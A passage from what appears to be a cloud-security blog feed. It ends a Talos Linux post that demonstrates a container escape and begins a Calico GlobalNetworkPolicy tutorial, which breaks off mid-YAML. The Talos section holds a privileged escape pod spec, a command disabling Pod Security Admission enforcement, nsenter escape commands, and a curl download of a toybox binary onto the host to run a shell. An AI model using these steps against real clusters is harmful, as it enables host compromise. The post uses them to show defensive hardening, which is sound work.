<h2 id="heading-security-posture-benefits">Security Posture Benefits</h2>
<p>So we have an OS that won’t let you <code>apt install</code> or <code>ssh</code> in when things break. What do we get? From a security perspective, we get gold. </p>
<p>These examples might be a bit generic, but you get the point:</p>
<h3 id="heading-smaller-attack-surface">Smaller Attack Surface</h3>
<p>There’s no SSH daemon to brute force, no shell to escape into, no random debug tools left lying around.  Most of the usual entry points simply don’t exist.</p>
<h3 id="heading-no-runtime-drift">No Runtime Drift</h3>
<p>On a standard Linux host, persistence could unfold as follows: tweak <code>/etc/ssh/sshd_config</code>, drop a binary in <code>/usr/bin</code>, or install a package and you’ve changed the security model. On Talos, those directories are read-only at runtime. Anything outside of the declared machine config is wiped away on reboot.</p>
<h3 id="heading-enforced-consistency">Enforced Consistency</h3>
<p>With Talos, “configuration drift” isn’t a problem to detect later. Nodes either match the declared config or they don’t come up. That consistency makes it much harder for subtle misconfigurations or shadow changes to slip by unnoticed.</p>
<h3 id="heading-api-driven-access">API-Driven Access</h3>
<p>Every interaction is authenticated and encrypted via gRPC with mTLS. There’s no “shared root password” floating around or keys to rotate. </p>
<p>Talos doesn’t make your Kubernetes cluster magically invincible. But by stripping away the common Linux attack surface and enforcing immutability at the OS level, it closes off whole categories of compromise before they even start.</p>
<hr />
<h2 id="heading-container-escape-fallout">Container Escape Fallout</h2>
<p>I covered a container compromise path in my <a target="_blank" href="https://cloudsecburrito.com/when-yaml-fights-back-my-runtime-security-talk-at-bsides">BSides Las Vegas talk</a>. For this post we’ll skip straight to the next chapter: <strong>what happens after the escape, when the attacker lands on the host?</strong></p>
<p>The usual way to simulate this is with <code>nsenter</code> from a privileged container.</p>
<p>Save the following spec as <code>escape.yaml</code>. The pod spec has the configuration needed for a container escape (host PID namespace, privileged mode, and the host root mounted at <code>/host</code>) and uses an image that already includes <code>nsenter</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">escape</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">hostPID:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">escape</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nicolaka/netshoot:latest</span>
      <span class="hljs-attr">command:</span> [<span class="hljs-string">"sleep"</span>, <span class="hljs-string">"3600"</span>]
      <span class="hljs-attr">securityContext:</span>
        <span class="hljs-attr">privileged:</span> <span class="hljs-literal">true</span>
      <span class="hljs-attr">volumeMounts:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
          <span class="hljs-attr">mountPath:</span> <span class="hljs-string">/host</span>
  <span class="hljs-attr">volumes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">host-root</span>
      <span class="hljs-attr">hostPath:</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
        <span class="hljs-attr">type:</span> <span class="hljs-string">Directory</span>
  <span class="hljs-attr">restartPolicy:</span> <span class="hljs-string">Never</span>
</code></pre>
<h3 id="heading-escaping-on-an-ubuntu-node">Escaping on an Ubuntu node</h3>
<p>Apply the pod on a cluster with regular Ubuntu nodes:</p>
<pre><code class="lang-bash">kubectl apply -f escape.yaml
</code></pre>
<p>Then exec in, escape, and play around:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Exec in</span>
matt@controlplane:~/container_escape$ kubectl <span class="hljs-built_in">exec</span> -it escape -- bash

<span class="hljs-comment"># Escape</span>
escape:~<span class="hljs-comment"># nsenter --target 1 --mount --uts --ipc --net --pid</span>

<span class="hljs-comment"># We are in</span>
<span class="hljs-comment"># uname</span>
Linux
<span class="hljs-comment"># whoami</span>
root
<span class="hljs-comment"># cat /etc/os-release</span>
PRETTY_NAME=<span class="hljs-string">"Ubuntu 24.04.3 LTS"</span>
NAME=<span class="hljs-string">"Ubuntu"</span>
VERSION_ID=<span class="hljs-string">"24.04"</span>
VERSION=<span class="hljs-string">"24.04.3 LTS (Noble Numbat)"</span>
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL=<span class="hljs-string">"https://www.ubuntu.com/"</span>
SUPPORT_URL=<span class="hljs-string">"https://help.ubuntu.com/"</span>
BUG_REPORT_URL=<span class="hljs-string">"https://bugs.launchpad.net/ubuntu/"</span>
PRIVACY_POLICY_URL=<span class="hljs-string">"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"</span>
UBUNTU_CODENAME=noble
LOGO=ubuntu-logo
</code></pre>
<p>Cool, that’s it. For kicks, you could try some other stuff.</p>
<h3 id="heading-install-tooling">Install Tooling</h3>
<p><strong>Ubuntu host:</strong></p>
<pre><code class="lang-bash">apt update &amp;&amp; apt install -y nmap
</code></pre>
<p>Yes, a full package manager at our disposal. Try more.</p>
<h3 id="heading-escaping-on-a-talos-node">Escaping on a Talos node</h3>
<p>Try it out on your Talos node with the same escape pod. The first thing you'll notice is that it doesn't meet <a target="_blank" href="https://kubernetes.io/docs/concepts/security/pod-security-admission/">PSA standards</a>.</p>
<pre><code class="lang-bash">matt.brown@matt Talos % kubectl apply -f escape.yaml
Error from server (Forbidden): error when creating <span class="hljs-string">"escape.yaml"</span>: pods <span class="hljs-string">"escape"</span> is forbidden: violates PodSecurity <span class="hljs-string">"restricted:latest"</span>: host namespaces (hostPID=<span class="hljs-literal">true</span>), privileged (container <span class="hljs-string">"escape"</span> must not <span class="hljs-built_in">set</span> securityContext.privileged=<span class="hljs-literal">true</span>), allowPrivilegeEscalation != <span class="hljs-literal">false</span> (container <span class="hljs-string">"escape"</span> must <span class="hljs-built_in">set</span> securityContext.allowPrivilegeEscalation=<span class="hljs-literal">false</span>), unrestricted capabilities (container <span class="hljs-string">"escape"</span> must <span class="hljs-built_in">set</span> securityContext.capabilities.drop=[<span class="hljs-string">"ALL"</span>]), restricted volume types (volume <span class="hljs-string">"host-root"</span> uses restricted volume <span class="hljs-built_in">type</span> <span class="hljs-string">"hostPath"</span>), runAsNonRoot != <span class="hljs-literal">true</span> (pod or container <span class="hljs-string">"escape"</span> must <span class="hljs-built_in">set</span> securityContext.runAsNonRoot=<span class="hljs-literal">true</span>), seccompProfile (pod or container <span class="hljs-string">"escape"</span> must <span class="hljs-built_in">set</span> securityContext.seccompProfile.type to <span class="hljs-string">"RuntimeDefault"</span> or <span class="hljs-string">"Localhost"</span>)
</code></pre>
<p>Ok, that’s annoying for a test, so let’s disable it to allow the pod to be created. Just change the label as follows:</p>
<pre><code class="lang-bash">kubectl label ns default pod-security.kubernetes.io/enforce=privileged --overwrite
</code></pre>
<p>Now apply it again and wait for your pod to spin up. Then try to escape again.</p>
<pre><code class="lang-bash">matt.brown@matt Talos % kubectl <span class="hljs-built_in">exec</span> -it escape -- /bin/bash
escape:~<span class="hljs-comment"># nsenter --target 1 --mount --uts --ipc --net --pid</span>
nsenter: failed to execute /bin/sh: No such file or directory
escape:~<span class="hljs-comment">#</span>
</code></pre>
<p>Ok, this is annoying again, but not unexpected, since the Talos host doesn’t ship a shell at <code>/bin/sh</code>. Let's try a workaround. We'll use the <code>toybox</code> binary and leverage its shell capabilities:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Download toybox through the /host mount so it lands on the host filesystem</span>
escape:~<span class="hljs-comment"># curl -L -o /host/var/tmp/toybox-aarch64 https://landley.net/toybox/downloads/binaries/latest/toybox-aarch64</span>
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  897k  100  897k    0     0  1162k      0 --:--:-- --:--:-- --:--:-- 1162k
escape:~<span class="hljs-comment"># chmod +x /host/var/tmp/toybox-aarch64</span>

<span class="hljs-comment"># Escape using the toybox binary (from the host mount namespace its path is /var/tmp/toybox-aarch64)</span>
escape:~<span class="hljs-comment"># nsenter --target 1 --mount --uts --ipc --net --pid -- \</span>
  /var/tmp/toybox-aarch64 sh -i

<span class="hljs-comment"># Check the OS and try some stuff</span>
$ cat /etc/os-release
NAME=<span class="hljs-string">"Talos"</span>
ID=talos
VERSION_ID=v1.11.0
PRETTY_NAME=<span class="hljs-string">"Talos (v1.11.0)"</span>
HOME_URL=<span class="hljs-string">"https://www.talos.dev/"</span>
BUG_REPORT_URL=<span class="hljs-string">"https://github.com/siderolabs/talos/issues"</span>
VENDOR_NAME=<span class="hljs-string">"Sidero Labs"</span>
VENDOR_URL=<span class="hljs-string">"https://www.siderolabs.com/"</span>
$ apt install
sh: apt: No such file or directory
$ <span class="hljs-built_in">echo</span> <span class="hljs-string">"haxx"</span> &gt; /etc/talos-test
sh: /etc/talos-test: Read-only file system
</code></pre>
<p>Try other things and you'll find the host is tightly locked down.</p>
<p>Escaping a container onto a typical Linux host is obviously not a good thing. Attackers get a full OS to play with, as we saw with the Ubuntu instance. Escaping onto Talos leaves them with… nothing useful. No packages, no persistence, no writable configs. The blast radius is dramatically smaller, and a single compromised node isn't game over for the whole cluster.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>I hope this helped you get a better understanding of Talos Linux. Talos strips away the usual chaos of a Linux host and leaves you with something closer to an appliance than an OS. On a regular Ubuntu node, escaping a container means you inherit a full operating system: shells, package managers, writable configs, and endless persistence tricks. On Talos, the same move drops you into a read-only world with no <code>apt</code>, no <code>/etc</code> changes, and no way to make anything stick past a reboot.</p>
<p>That difference is the point. Talos trades flexibility for predictability. You don’t get the comfort of tinkering when things break, but you also don’t get the mess of drift or attackers turning a one-off compromise into a permanent foothold. Instead, every node is defined by YAML, accessed by an API, and reset to its declared state at boot.</p>
<p>It’s not a platform for hobbyist debugging, but it is a strong foundation for the real world where consistency and security matter more than convenience. Talos makes Kubernetes boring, and that's not such a bad thing. </p>
<p>If you're exploring the immutable space, Talos is absolutely worth the time. It delivers on the promise of a minimal, locked-down base that is purpose-built for Kubernetes, rather than retrofitted from a general-purpose distro. If your goal is to cut drift, reduce your attack surface, and manage clusters as code (isn't that everyone's goal?), Talos fits neatly into that toolkit. There is of course a lot more to Talos, so definitely check it out.</p>
]]></content:encoded></item><item><title><![CDATA[Service Boundaries: Scaling with Calico]]></title><description><![CDATA[In Part 1 we took Kubernetes from “wide open by default” to a clean three-hop app chain. With a handful of NetworkPolicy manifests we locked the cluster down to just the flows the app actually needs: frontend → backend → database, plus DNS. Everythin...]]></description><link>https://cloudsecburrito.com/service-boundaries-scaling-with-calico</link><guid isPermaLink="true">https://cloudsecburrito.com/service-boundaries-scaling-with-calico</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[networkpolicy]]></category><category><![CDATA[calico]]></category><category><![CDATA[Calico Networking]]></category><category><![CDATA[Security]]></category><category><![CDATA[cloudsecurity]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 03 Sep 2025 22:43:59 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1756937946437/eb260b35-b792-43e0-83e6-7c93c11392f9.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In <a target="_blank" href="https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics">Part 1</a> we took Kubernetes from “wide open by default” to a clean three-hop app chain. With a handful of <code>NetworkPolicy</code> manifests we locked the cluster down to just the flows the app actually needs: frontend → backend → database, plus DNS. Everything else? Nuke it.</p>
<p>That’s definitely a good start. But here’s the catch (always with the <em>catch</em>): what happens when you’re running <strong>a host of namespaces and services</strong>? Copy-pasting the same default-deny and DNS carve-outs everywhere doesn’t scale. Neither does sprinkling external CIDRs into random policies every time something needs to call an outside system.</p>
<p>This is where <strong>Calico</strong> steps in. It takes the same <code>NetworkPolicy</code> model you already know (and now love) and adds the missing pieces for real-world operations:</p>
<ul>
<li><p><strong>Global guardrails</strong> so you can enforce a cluster-wide baseline once.</p>
</li>
<li><p><strong>Flow logs</strong> so you can actually see what’s being allowed and denied.</p>
</li>
</ul>
<p>In other words, Calico isn’t a replacement for <code>NetworkPolicy</code> — it’s the natural next layer. It lets you move from blog-sized policies to <strong>real boundaries</strong> without drowning in YAML.</p>
<hr />
<h2 id="heading-what-the-hell-is-calico">What the Hell Is Calico?</h2>
<p>If you’ve been around Kubernetes for five minutes, you’ve probably seen the name <strong>Calico</strong>. For me, it started as the dead-simple CNI for my local kubeadm clusters: just wire up pod networking and get on with life. But as I dug deeper into NetworkPolicy, I noticed Calico showing up again. This time not just as plumbing, but as an add-on for security and visibility. So… what's the real deal?</p>
<p>At its core, <strong>Calico is both a networking layer and a security layer for Kubernetes</strong>. But it is really a full platform that can still act as your CNI, but also enforce policies, define global defaults, manage external networks, and generate flow logs for visibility. In other words, everything you learned with <code>NetworkPolicy</code> in Part 1 still applies, but Calico adds the missing pieces to make those guardrails scale across real clusters.</p>
<p>Today, Calico can:</p>
<ul>
<li><p>Enforce <strong>Kubernetes</strong> <code>NetworkPolicy</code> natively, just like the baseline rules we used in Part 1.</p>
</li>
<li><p>Extend those policies with <strong>Calico-only features</strong> like <code>GlobalNetworkPolicy</code>.</p>
</li>
<li><p>Provide <strong>flow logs and observability</strong>, so you can see what’s being allowed or denied.</p>
</li>
</ul>
<p>The important thing to know: you don’t need to swap out Kubernetes concepts to use Calico. It still understands <code>NetworkPolicy</code>. It just adds the missing pieces that make policies usable at scale.</p>
<hr />
<h2 id="heading-global-guardrails">Global Guardrails</h2>
<p>In Part 1 we locked down a simple three-tier app (frontend → backend → database) using Kubernetes <code>NetworkPolicy</code>. That worked well for a demo, but it quickly gets annoying when you move beyond a single app. Each namespace needs its own copy of the same baseline: default-deny, DNS egress, and the handful of allowed flows. Good luck keeping that up.</p>
<p>This is where Calico’s <strong>GlobalNetworkPolicy</strong> comes in. Unlike standard <code>NetworkPolicy</code>, which only applies inside a single namespace, a <code>GlobalNetworkPolicy</code> is enforced cluster-wide. That means you can set a universal default-deny once, or a universal DNS allow, and not worry about duplicating YAML everywhere. Sounds useful.</p>
<p>Here’s a simple example: a cluster-wide default-deny for all ingress and egress. It's similar to our earlier <code>NetworkPolicy</code>, but now it's global, with exceptions carved out for the system namespaces that keep the cluster running. Save it as <code>global_networkpolicy_deny.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">00</span><span class="hljs-string">-default-deny</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">"kubernetes.io/metadata.name not in {'kube-system','calico-system','calico-apiserver','tigera-operator'}"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>, <span class="hljs-string">Egress</span>]
  <span class="hljs-attr">ingress:</span> []
  <span class="hljs-attr">egress:</span> []
</code></pre>
<p>With that in place, <em>every</em> workload in the cluster is locked down by default. Let's give it a try.</p>
<blockquote>
<p>Lab only or chaos will ensue. And even in the lab chaos can ensue without the namespaceSelector. An hour wasted, trust me.</p>
</blockquote>
<p>Start by applying the policy:</p>
<pre><code class="lang-bash">matt@controlplane:~/calico$ kubectl apply -f global_networkpolicy_deny.yaml
globalnetworkpolicy.projectcalico.org/00-default-deny created
</code></pre>
<p>Next, let's run the same test as we did in <a target="_blank" href="https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics#heading-from-frontend-shell">Part 1</a>.</p>
<pre><code class="lang-bash">matt@controlplane:~/calico$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
curl: (6) Could not resolve host: api.backend.svc.cluster.local</span>
</code></pre>
<p>It just works: the lookup fails because the global deny now blocks everything, including DNS.</p>
<p>You'll notice we’re no longer using <code>networking.k8s.io/v1/NetworkPolicy</code> and are now taking advantage of the cool stuff Calico provides. Calico introduces its own <strong>Custom Resource Definitions (CRDs)</strong> for extended policy objects. Of course, that's why the YAML here says <code>apiVersion: projectcalico.org/v3</code>. So what does our CRD look like?</p>
<p>Do a quick check at the top of our CRD:</p>
<pre><code class="lang-bash">kubectl get crd globalnetworkpolicies.crd.projectcalico.org -o yaml | head -15
</code></pre>
<p>And sure enough, our loyal feline has installed a CRD just for this:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">apiextensions.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">CustomResourceDefinition</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">globalnetworkpolicies.crd.projectcalico.org</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">group:</span> <span class="hljs-string">projectcalico.org</span>
  <span class="hljs-attr">names:</span>
    <span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
    <span class="hljs-attr">plural:</span> <span class="hljs-string">globalnetworkpolicies</span>
    <span class="hljs-attr">singular:</span> <span class="hljs-string">globalnetworkpolicy</span>
  <span class="hljs-attr">scope:</span> <span class="hljs-string">Cluster</span>
  <span class="hljs-attr">versions:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">v3</span>
    <span class="hljs-attr">served:</span> <span class="hljs-literal">true</span>
    <span class="hljs-attr">storage:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>That <code>names.kind: GlobalNetworkPolicy</code> is the important part: it defines a new top-level resource that extends Kubernetes network policy to the entire cluster. This CRD is what makes the <code>apiVersion: projectcalico.org/v3</code> YAML valid, and it connects directly into the same enforcement pipeline you saw with native <code>NetworkPolicy</code>. The difference is scope! Instead of being limited to a single namespace, <code>GlobalNetworkPolicy</code> applies consistently across every namespace in the cluster.</p>
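<p>If you want to poke around yourself, here's a quick way to confirm what Calico registered (a sketch; the exact resource list varies by Calico version and install method):</p>
<pre><code class="lang-bash"># Cluster-scoped Calico policy objects (served via the Calico API server)
kubectl get globalnetworkpolicies.projectcalico.org

# Everything Calico added to the API surface
kubectl api-resources | grep -i calico
</code></pre>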
<p>So what did our global deny just break, and what do we need to carve back out first?</p>
<hr />
<h3 id="heading-dns-under-global-default-deny-calico">DNS Under Global Default-Deny (Calico)</h3>
<p>As soon as you flip on a <strong>global default-deny</strong>, the first thing that quietly dies is DNS. Service lookups stop working, external names can’t resolve, and suddenly every other test fails for mysterious reasons. Yes, I'm repeating Part 1.</p>
<p>That’s because DNS is just another flow — but it’s one that <em>every pod in the cluster</em> depends on. So before we can even think about app-to-app traffic, we need to carve DNS back out at the global level.</p>
<p>Two things must happen for lookups to work end-to-end:</p>
<ol>
<li><p><strong>Workloads must be allowed to query CoreDNS</strong> (egress 53/UDP+TCP).</p>
</li>
<li><p><strong>CoreDNS itself must be allowed to talk out</strong> — to the <strong>kube-apiserver</strong> (TCP/443) for watching Services/Endpoints, and to any <strong>upstream DNS resolvers</strong> it forwards to (53/UDP+TCP).</p>
</li>
</ol>
<h3 id="heading-primer-on-order">Primer on <code>order</code></h3>
<p>Once you move to Calico, policies aren’t just namespace-scoped lists, they’re evaluated by <strong>order</strong>.</p>
<ul>
<li><p><strong>Lower numbers = higher priority</strong>.</p>
</li>
<li><p>The first policy that matches and has a decisive action wins.</p>
</li>
<li><p>The global default-deny can omit <code>order</code> and be last.</p>
</li>
<li><p>DNS carve-outs need to sit at a slightly higher order (e.g. <code>20</code> and <code>21</code>) so they apply before the deny.</p>
</li>
</ul>
<p>Think of it like firewall rules: you want your DNS “allow” rules above the blanket “deny everything” rule.</p>
<h3 id="heading-the-yaml">The YAML</h3>
<p>Below is a single file that sets up two global policies: one for client pods to reach CoreDNS, and another for CoreDNS itself to reach the API server and upstream resolvers.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">01</span><span class="hljs-string">-dns-clients-egress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">20</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">"all()"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">02</span><span class="hljs-string">-dns-core</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">21</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>, <span class="hljs-string">Egress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">"all()"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">"all()"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-comment"># kube-apiserver Service IP (replace if different; often 10.96.0.1)</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">nets:</span> [<span class="hljs-string">"10.96.0.1/32"</span>]
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">443</span>]
    <span class="hljs-comment"># Upstream DNS resolvers (replace with your real upstreams)</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">UDP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">nets:</span> [<span class="hljs-string">"8.8.8.8/32"</span>,<span class="hljs-string">"8.8.4.4/32"</span>]
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">nets:</span> [<span class="hljs-string">"8.8.8.8/32"</span>,<span class="hljs-string">"8.8.4.4/32"</span>]
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">53</span>]
</code></pre>
<h3 id="heading-what-this-does">What this does</h3>
<ul>
<li><p><strong>Clients → CoreDNS</strong>: any pod can send DNS queries to the DNS pods on UDP/TCP 53.</p>
</li>
<li><p><strong>Ingress into CoreDNS</strong>: opens 53 on DNS pods so queries aren’t dropped when ingress is enforced.</p>
</li>
<li><p><strong>CoreDNS → API server</strong>: lets CoreDNS watch Service/Endpoint changes on TCP/443 (required for cluster-local names).</p>
</li>
<li><p><strong>CoreDNS → upstream resolvers</strong>: if CoreDNS forwards externals, allow 53/UDP+TCP to those IPs (demo uses Google DNS; swap for your own).</p>
</li>
</ul>
<h3 id="heading-tips">Tips</h3>
<ul>
<li><p><strong>Find the API server ClusterIP</strong>:</p>
<pre><code class="lang-bash">  kubectl get svc kubernetes -n default -o jsonpath=<span class="hljs-string">'{.spec.clusterIP}'</span>
</code></pre>
</li>
<li><p><strong>Match CoreDNS labels on any distro</strong>:<br />  <code>'(k8s-app == "kube-dns") || (app.kubernetes.io/name == "coredns")'</code></p>
</li>
<li><p><strong>Test quickly</strong>:</p>
<pre><code class="lang-bash">  kubectl run -n backend <span class="hljs-built_in">test</span> --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
  dig +short kubernetes.default.svc.cluster.local
  dig +short google.com
</code></pre>
</li>
</ul>
<h3 id="heading-straight-to-business">Straight to Business</h3>
<p>With this in place, DNS is restored across the cluster while the global default-deny remains active. Instead of sprinkling DNS exceptions into every namespace, you do it once globally — less YAML, fewer mistakes.</p>
<p>So now we’re at:</p>
<ul>
<li><p><strong>Global default-deny</strong>: in place and enforced.</p>
</li>
<li><p><strong>Global DNS allow</strong>: carved out so names resolve cluster-wide.</p>
</li>
</ul>
<p>That’s the baseline. Next up: app traffic.</p>
<hr />
<h2 id="heading-app-flows-under-global-deny">App Flows Under Global Deny</h2>
<p>Recall from <a target="_blank" href="https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics#heading-allow-service-to-service-flows">Part 1</a>, our clean three‑tier app chain: frontend → backend → database. Those namespace‑scoped <code>NetworkPolicy</code> objects worked great on their own.</p>
<p>But once you enable a <strong>Global Default‑Deny</strong>, those app flows no longer work. The global policy applies everywhere, so even the frontend can’t reach the backend unless you explicitly make space for it.</p>
<p>So what do you do? You’ve got at least two main paths forward.</p>
<h3 id="heading-option-a-keep-kubernetes-networkpolicy-working">Option A — Keep Kubernetes <code>NetworkPolicy</code> Working</h3>
<p>The simplest way is to exclude your app namespaces from the global deny. That way, <code>frontend</code>, <code>backend</code>, and <code>db</code> continue to be governed by the native policies you wrote in Part 1. Everywhere else in the cluster stays locked down.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">00</span><span class="hljs-string">-default-deny</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">"kubernetes.io/metadata.name not in {'kube-system','calico-system','calico-apiserver','tigera-operator','frontend','backend','db'}"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>, <span class="hljs-string">Egress</span>]
  <span class="hljs-attr">ingress:</span> []
  <span class="hljs-attr">egress:</span> []
</code></pre>
<p>I'd rate this approach as barely good enough for quick labs and definitely not built for scale: every new app namespace means another edit to the global deny's exclusion list, and any namespace you forget stays wide open to its own devices.</p>
<h3 id="heading-option-b-calico-globals-with-explicit-ingress-and-egress">Option B — Calico Globals (with explicit ingress <strong>and</strong> egress)</h3>
<p>Re-express the app flows as <strong>Calico GlobalNetworkPolicies</strong> with <code>order</code> so they evaluate <strong>before</strong> the global deny. You must allow <strong>both directions</strong>: permit <strong>ingress</strong> on the destination tier and <strong>egress</strong> from the source tier. This is not too different from our previous network policies.</p>
<h4 id="heading-frontend-backend-http-80">Frontend → Backend (HTTP :80)</h4>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">09</span><span class="hljs-string">-frontend-egress-to-backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">9</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">projectcalico.org/namespace</span> <span class="hljs-string">==</span> <span class="hljs-string">"frontend"</span>  
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>                      
